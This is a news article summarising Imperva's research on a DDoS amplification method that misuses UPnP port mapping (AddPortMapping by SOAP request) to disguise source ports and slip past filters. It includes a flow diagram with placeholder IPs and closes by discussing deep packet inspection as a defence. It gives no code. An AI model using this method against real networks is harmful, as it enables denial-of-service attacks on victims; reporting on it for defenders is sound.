New DDoS Attack Using UPnP Bypasses Current Defenses
 
There has been a rise in DDoS attacks that utilize amplification attack vectors. These are exploitations of remote servers and databases exposed on the public internet to magnify the amount of data being set to them and turning into a DDoS attack.
 
In March of this year, GitHub was a target of the largest DDoS attack to date. Attackers used a memcached amplification method to sustain a 1.3 terabits per second traffic for over eight minutes. Though these attacks have been largely mitigated, researchers at Imperva discovered that UPnP protocols bypasses current defense methods.
 
Such attacks usually require an equally large botnet but the amplification vectors allow for a bit of a shortcut for hackers. These types of assaults have been mostly remedied because there are predictable patterns to these amplification payloads. Co-authors of the report Avishay Zawoznik, Johnathan Azaria and Igal Zeifman wrote, “For example, blocking all packets with source port 53 is considered a tried-and-true method for mitigating DNS amplification attacks.”
 
But in April researchers spotted an unusual SSDP amplification attack which did not come from the port they were expecting, port 1900. SSDP is a protocol that UPnP devices use to share UDP (User Datagram Protocol) data on port 1900.
 
The Imperva report lays out their proof-of-concept which starts by finding exploitable UPnP gateway devices using the Shodan search engine to get a file called “rootDesc.xml.” The report states, “Cataloged in rootDesc.xml are all of the available UPnP services and devices.”
 
When they locate a vulnerable device, the file shows all the commands that the device will accept remotely. The “AddPortMapping” command, for example, can be used to change the rules for port forwarding.
 
The report stated, “Using the scheme within the file, a SOAP request can be crafted to create a forwarding rule that reroutes all UDP packets sent to port 1337 to an external DNS server (3.3.3.3) via port UDP/53.”
 
Attacker|1.1.1.1|---Source Port: 80---(1)---Destination Port: 1337--->UPnP Device |2.2.2.2|---Source Port: 1337---(2)---Destination Port: 53--->DNS Server |3.3.3.3|
Victim|4.4.4.4|<---Source Port: 1337---(4)---Destination Port: 80---UPnP Device |2.2.2.2|<---Source Port: 53---(3)---Destination Port: 1337---DNS Server　|3.3.3.3|
 
The attacker sends a DNS request on port(UDP/1337) to the UPnP device to the DNS server to be  obfuscated (UDP/53). The DNS server responds to port 53 and changes the source port back to UDP/1337.
 
This proof of concept shows that source IP and port information is no longer reliable filters for defending against attacks. The research suggest that “he most likely answer is to perform deep packet inspection to identify amplification payloads—a more resource-intensive process, which is challenging to perform at an inline rate without access to dedicated mitigation equipment.”
 
At the moment there are no clear cut approach against defending against these attacks which can leave networks with IoT devices vulnerable. The hope is by spreading the news of this exploit, it can help users be on the lookout for such attacks and reach those that may be able to find a solution.

Original Article: https://www.imperva.com/blog/2018/05/new-ddos-attack-method-demands-a-fresh-approach-to-amplification-assault-mitigation/